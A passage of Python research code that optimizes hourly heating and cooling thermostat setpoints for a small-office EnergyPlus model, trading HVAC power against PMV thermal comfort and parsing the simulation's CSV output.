self.CSP18 = solution.variables[17]
self.CSP19 = solution.variables[18]
self.CSP20 = solution.variables[19]
self.CSP21 = solution.variables[20]
self.CSP22 = solution.variables[21]
self.CSP23 = solution.variables[22]
self.CSP24 = solution.variables[23]
self.HSP1 = solution.variables[24]
self.HSP2 = solution.variables[25]
self.HSP3 = solution.variables[26]
self.HSP4 = solution.variables[27]
self.HSP5 = solution.variables[28]
self.HSP6 = solution.variables[29]
self.HSP7 = solution.variables[30]
self.HSP8 = solution.variables[31]
self.HSP9 = solution.variables[32]
self.HSP10 = solution.variables[33]
self.HSP11 = solution.variables[34]
self.HSP12 = solution.variables[35]
self.HSP13 = solution.variables[36]
self.HSP14 = solution.variables[37]
self.HSP15 = solution.variables[38]
self.HSP16 = solution.variables[39]
self.HSP17 = solution.variables[40]
self.HSP18 = solution.variables[41]
self.HSP19 = solution.variables[42]
self.HSP20 = solution.variables[43]
self.HSP21 = solution.variables[44]
self.HSP22 = solution.variables[45]
self.HSP23 = solution.variables[46]
self.HSP24 = solution.variables[47]
self.results = buildingSim(self.idfdevice, [self.CSP1, self.CSP2, self.CSP3, self.CSP4, self.CSP5, self.CSP6,
self.CSP7, self.CSP8, self.CSP9, self.CSP10, self.CSP11, self.CSP12,
self.CSP13, self.CSP14, self.CSP15, self.CSP16, self.CSP17, self.CSP18,
self.CSP19, self.CSP20, self.CSP21, self.CSP22, self.CSP23, self.CSP24],
[self.HSP1, self.HSP2, self.HSP3, self.HSP4, self.HSP5, self.HSP6,
self.HSP7, self.HSP8, self.HSP9, self.HSP10, self.HSP11, self.HSP12,
self.HSP13, self.HSP14, self.HSP15, self.HSP16, self.HSP17, self.HSP18,
self.HSP19, self.HSP20, self.HSP21, self.HSP22, self.HSP23, self.HSP24])
print('=== hvacPower_ave = %f ===' % self.results.hvacPower_ave)
print('=== allPMV_max = %f ===' % self.results.allPMV_max)
print('=== allPMV_min = %f ===' % self.results.allPMV_min)
'''matrix that extracts pmv values for working hours'''
pmvI = np.identity(48)
pmvA = np.identity(48)*5
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37,
# 38, 39, 40, 41, 42, 43, 44, 45, 46, 47]
offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 42, 43, 44, 45, 46, 47]
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23]
for i in offHours:
pmvI[i, i] = 0
pmvA[i, i] = 0
'''matrix for hvac power weight'''
hvacA = np.identity(48)*0.0000001
'''matrix for applying derivative constraint'''
diagonal = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
D = np.diag(diagonal, 1)
setpoints = np.array([self.CSP1, self.CSP2, self.CSP3, self.CSP4, self.CSP5, self.CSP6, self.CSP7, self.CSP8,
self.CSP9, self.CSP10, self.CSP11, self.CSP12, self.CSP13, self.CSP14, self.CSP15,
self.CSP16, self.CSP17, self.CSP18, self.CSP19, self.CSP20, self.CSP21, self.CSP22,
self.CSP23, self.CSP24,
self.HSP1, self.HSP2, self.HSP3, self.HSP4, self.HSP5, self.HSP6, self.HSP7, self.HSP8,
self.HSP9, self.HSP10, self.HSP11, self.HSP12, self.HSP13, self.HSP14, self.HSP15,
self.HSP16, self.HSP17, self.HSP18, self.HSP19, self.HSP20, self.HSP21, self.HSP22,
self.HSP23, self.HSP24])
'''matrix for changing setpoint downwards cost'''
constDownA = np.identity(48)*0.05
constrainDown = setpoints.T - D@setpoints.T
print(constrainDown)
print('objective 1: %f' % (self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
print('objective 2: %f' % (self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
print('objective 3: %f' % (constrainDown@constDownA@constrainDown.T))
'''hvac power demand and predicted mean vote objective function'''
solution.objectives[0] = np.sqrt((self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
solution.objectives[1] = np.sqrt((self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
solution.objectives[2] = np.sqrt((constrainDown@constDownA@constrainDown.T))
'''thermal comfort constraints'''
solution.constraints[:] = abs(pmvI@self.results.allPMV_mean1[0, 0:48].T) - 1
'''optimization problem for a single set point temperature (for simplicity)'''
class SO2(Problem):
def __init__(self, Begin_Month, Begin_Day_of_Month, End_Month, End_Day_of_Month):
'''define SEB problem as having 2 decision variables (Space Thermostat HTG and CLG Setpoint), 2 objective
(HVAC Demand + PMV) and 48 constraints (PMV values and derivatives)'''
super(SO2, self).__init__(2, 2, 48)
'''define the two decision variables as real values with limited ranges
30 total variables for heating and cooling setpoints for a 24 hour period'''
self.types[:] = [Real(23.5, 30), Real(15.5, 23)]
'''define the types of constraints that will be used in the problem definition'''
self.constraints[:] = "<=0"
'''introduce the necessary files for the building simulation'''
self.iddfile = "C:\EnergyPlusV8-5-0\Energy+.idd"
self.fname = "SmallOffice.idf"
self.weatherfile = "USA_MI_Lansing-Capital.City.AP.725390_TMY3.epw"
'''initialize idf file'''
IDF.setiddname(self.iddfile)
self.idfdevice = IDF(self.fname, self.weatherfile)
'''initialize idf file for specified outputs and simulation period'''
'''update the run period fields'''
for object in self.idfdevice.idfobjects['RUNPERIOD']:
object.Begin_Month = Begin_Month
object.Begin_Day_of_Month = Begin_Day_of_Month
object.End_Month = End_Month
object.End_Day_of_Month = End_Day_of_Month
'''update the simulation control variables'''
for object in self.idfdevice.idfobjects['SIMULATIONCONTROL']:
object.Do_Zone_Sizing_Calculation = 'Yes'
object.Do_System_Sizing_Calculation = 'Yes'
object.Do_Plant_Sizing_Calculation = 'Yes'
object.Run_Simulation_for_Sizing_Periods = 'No'
object.Run_Simulation_for_Weather_File_Run_Periods = 'Yes'
print('=== Sumulation Control Parameters Changed ===')
'''add thermal comfort model to people objects'''
for object in self.idfdevice.idfobjects['PEOPLE']:
object.Surface_NameAngle_Factor_List_Name = ''
object.Work_Efficiency_Schedule_Name = 'WORK_EFF_SCH'
object.Clothing_Insulation_Schedule_Name = 'CLOTHING_SCH'
object.Air_Velocity_Schedule_Name = 'AIR_VELO_SCH'
object.Thermal_Comfort_Model_1_Type = 'Fanger'
'''Fanger PMV thermal comfort model (Zone Average)'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermal Comfort Fanger Model PMV'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Fanger PPD thermal comfort model (Zone Average)'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermal Comfort Fanger Model PPD'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Total Purchase Electric Energy [J]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Facility Total Purchased Electric Energy'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Total HVAC Demand [W]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Facility Total HVAC Electric Demand Power'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Hourly cooling temperature setpoint [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Cooling Setpoint Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Hourly heating temperature setpoint [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Heating Setpoint Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
'''Zone thermostat air temperature [°C]'''
self.idfdevice.newidfobject('OUTPUT:VARIABLE')
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Variable_Name = 'Zone Thermostat Air Temperature'
self.idfdevice.idfobjects['OUTPUT:VARIABLE'][-1].Reporting_Frequency = 'Hourly'
def evaluate(self, solution):
self.CSP1 = solution.variables[0]
self.HSP1 = solution.variables[1]
self.results = buildingSim(self.idfdevice, [self.CSP1],
[self.HSP1])
print('=== hvacPower_ave = %f ===' % self.results.hvacPower_ave)
print('=== allPMV_max = %f ===' % self.results.allPMV_max)
print('=== allPMV_min = %f ===' % self.results.allPMV_min)
'''matrix that extracts pmv values for working hours'''
pmvI = np.identity(48)
pmvA = np.identity(48)*5
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37,
# 38, 39, 40, 41, 42, 43, 44, 45, 46, 47]
offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 42, 43, 44, 45, 46, 47]
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23]
for i in offHours:
pmvI[i, i] = 0
pmvA[i, i] = 0
'''matrix for hvac power weight'''
hvacA = np.identity(48)*0.0000001
'''matrix for applying derivative constraint'''
# diagonal = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
# D = np.diag(diagonal, 1)
# setpoints = np.array([self.CSP1,
# self.HSP1])
'''matrix for changing setpoint downwards cost'''
# constDownA = np.identity(48)*0.05
# constrainDown = setpoints.T - D@setpoints.T
# print(constrainDown)
print('objective 1: %f' % (self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
print('objective 2: %f' % (self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
# print('objective 3: %f' % (constrainDown@constDownA@constrainDown.T))
'''hvac power demand and predicted mean vote objective function'''
solution.objectives[0] = np.sqrt((self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
solution.objectives[1] = np.sqrt((self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
# solution.objectives[2] = np.sqrt((constrainDown@constDownA@constrainDown.T))
'''thermal comfort constraints'''
solution.constraints[:] = abs(pmvI@self.results.allPMV_mean1[0, 0:48].T) - 1
class buildingSim:
def __init__(self, idfdevice, CLG_SETPOINT, HTG_SETPOINT):
'''update setpoints and run energyplus simulation'''
'''append setpoints from optimizer to the optimized list'''
# OptCS[(24 - len(CLG_SETPOINT)):] = CLG_SETPOINT
# OptHS[(24 - len(HTG_SETPOINT)):] = HTG_SETPOINT
'''update idf with uncertain parameters for the parameter file listed'''
runJSON = {}
for object in paramSet['input']: runJSON[object['eppy json string']] = object['Sample Values'][random.randint(0, len(object['Sample Values'])-1)]
json_functions.updateidf(idfdevice, runJSON)
'''modify idf with inputs'''
self.runJSON = {'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_1': 'Through: %s/%s' % ('12', '31'),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_2': 'For: Weekday',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_3': 'Until: 1:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_4': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_5': 'Until: 2:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_6': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_7': 'Until: 3:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_8': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_9': 'Until: 4:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_10': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_11': 'Until: 5:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_12': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_13': 'Until: 6:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_14': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_15': 'Until: 7:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_16': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_17': 'Until: 8:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_18': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_19': 'Until: 9:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_20': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_21': 'Until: 10:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_22': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_23': 'Until: 11:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_24': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_25': 'Until: 12:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_26': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_27': 'Until: 13:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_28': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_29': 'Until: 14:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_30': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_31': 'Until: 15:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_32': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_33': 'Until: 16:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_34': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_35': 'Until: 17:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_36': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_37': 'Until: 18:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_38': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_39': 'Until: 19:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_40': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_41': 'Until: 20:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_42': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_43': 'Until: 21:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_44': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_45': 'Until: 22:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_46': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_47': 'Until: 23:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_48': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_49': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_50': str(CLG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_51': 'For: Weekend',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_52': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_53': str(29.44),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_54': 'For: Holiday',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_55': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_56': str(29.44),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_57': 'For: WinterDesignDay',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_58': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_59': str(29.44),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_60': 'For: SummerDesignDay',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_61': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_62': str(29.44),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_63': 'For: CustomDay1',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_64': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_65': str(29.44),
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_66': 'For: CustomDay2',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_67': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.CLGSETP_SCH_YES_OPTIMUM.Field_68': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_1': 'Through: %s/%s' % ('12', '31'),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_2': 'For: Weekday',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_3': 'Until: 1:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_4': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_5': 'Until: 2:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_6': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_7': 'Until: 3:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_8': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_9': 'Until: 4:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_10': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_11': 'Until: 5:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_12': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_13': 'Until: 6:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_14': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_15': 'Until: 7:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_16': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_17': 'Until: 8:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_18': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_19': 'Until: 9:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_20': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_21': 'Until: 10:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_22': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_23': 'Until: 11:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_24': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_25': 'Until: 12:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_26': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_27': 'Until: 13:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_28': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_29': 'Until: 14:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_30': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_31': 'Until: 15:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_32': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_33': 'Until: 16:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_34': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_35': 'Until: 17:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_36': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_37': 'Until: 18:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_38': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_39': 'Until: 19:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_40': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_41': 'Until: 20:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_42': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_43': 'Until: 21:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_44': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_45': 'Until: 22:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_46': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_47': 'Until: 23:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_48': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_49': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_50': str(HTG_SETPOINT[0]),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_51': 'For: Weekend',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_52': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_53': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_54': 'For: Holiday',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_55': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_56': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_57': 'For: WinterDesignDay',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_58': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_59': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_60': 'For: SummerDesignDay',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_61': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_62': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_63': 'For: CustomDay1',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_64': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_65': str(29.44),
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_66': 'For: CustomDay2',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_67': 'Until: 24:00',
'idf.SCHEDULE:COMPACT.HTGSETP_SCH_YES_OPTIMUM.Field_68': str(29.44)
}
json_functions.updateidf(idfdevice, self.runJSON)
'''run IDF and the associated batch file to export the custom csv output'''
'''self, idf='SmallOffice.idf', weather='USA_UT_Salt.Lake.City.Intl.AP.725720_TMY3.epw', ep_version='8-5-0'''
idfdevice.run(verbose='q')
os.system(r'CD E:\Masters Thesis\EnergyPlus MPC\Simulations\Baseline')
os.system('CustomCSV SO OUTPUT')
# self.smallofficeoutputs('SO_OUTPUT_hourly.csv')
'''Read csv file into new data dictionary'''
newEntry = defaultdict(list)
with open('SO_OUTPUT_hourly.csv', newline='') as newFile:
newData = csv.DictReader(newFile)
for row in newData:
[newEntry[key].append(value) for key, value in row.items()]
'''Date/Time array'''
self.DateTime = np.asarray(newEntry['Date/Time'], dtype=str)
'''Outdoor dry bulb temperature'''
self.outdoorT = np.asarray(newEntry['Environment:Site Outdoor Air Drybulb Temperature [C](Hourly)'],
dtype=np.float32)
'''PMV values for core zone'''
self.corePMV = np.asarray(newEntry['CORE_ZN:Zone Thermal Comfort Fanger Model PMV [](Hourly)'],
dtype=np.float32)
self.corePMV_mean = np.mean(self.corePMV)
self.corePMV_max = np.max(self.corePMV)
self.corePMV_min = np.min(self.corePMV)
'''PMV values for zone 1'''
self.zn1PMV = np.asarray(newEntry['PERIMETER_ZN_1:Zone Thermal Comfort Fanger Model PMV [](Hourly)'],
dtype=np.float32)
self.zn1PMV_mean = np.mean(self.zn1PMV)
self.zn1PMV_max = np.max(self.zn1PMV)
self.zn1PMV_min = np.min(self.zn1PMV)
'''PMV values for zone 2'''
self.zn2PMV = np.asarray(newEntry['PERIMETER_ZN_2:Zone Thermal Comfort Fanger Model PMV [](Hourly)'],
dtype=np.float32)
self.zn2PMV_mean = np.mean(self.zn2PMV)
self.zn2PMV_max = np.max(self.zn2PMV)
self.zn2PMV_min = np.min(self.zn2PMV)
'''PMV values for zone 3'''
self.zn3PMV = np.asarray(newEntry['PERIMETER_ZN_3:Zone Thermal Comfort Fanger Model PMV [](Hourly)'],
dtype=np.float32)
self.zn3PMV_mean = np.mean(self.zn3PMV)
self.zn3PMV_max = np.max(self.zn3PMV)
self.zn3PMV_min = np.min(self.zn3PMV)
'''PMV values for zone 4'''
self.zn4PMV = np.asarray(newEntry['PERIMETER_ZN_4:Zone Thermal Comfort Fanger Model PMV [](Hourly)'],
dtype=np.float32)
